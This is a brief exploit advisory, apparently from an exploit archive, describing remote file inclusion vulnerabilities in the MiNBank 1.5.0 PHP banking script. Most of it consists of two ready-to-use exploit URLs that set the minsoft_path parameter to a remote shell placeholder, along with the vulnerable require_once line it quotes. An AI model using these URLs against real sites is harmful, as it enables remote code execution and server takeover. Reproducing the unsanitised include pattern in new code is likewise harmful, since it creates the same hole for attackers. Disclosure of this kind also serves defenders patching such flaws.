id: 3806
date: 09/29/2008
title: MiNBank 1.5.0 Multiple Remote File Inclusion Vulnerability
author: DaRkLiFe
cves: 

==========================================================
MiNBank 1.5.0 Multiple Remote File Inclusion Vulnerability
==========================================================


**************************************************************************************
Script   :
Micronation Banking System(minba) 1.5.0
Remote File Inclusion Vulnerability(s)

Download:
http://downloads.sourceforge.net/minbank/minba_v0150.zip?modtime=1169500084&big_mirror=0

**************************************************************************************

Exploit : http://site.com/minba/utility/utdb_access.php?minsoft_path=Shellz?


http://site.com/minba/utility/utgn_message.php?minsoft_path=Shellz?

**************************************************************************************

In Multiple files the vulnerability exists.

I have posted two examples

Vulberable : line 3 : require_once("$minsoft_path/utility/utgn_config.php");
in minba/utility/utgn_message.php file


**************************************************************************************



#  0day.today [2023-03-26]  #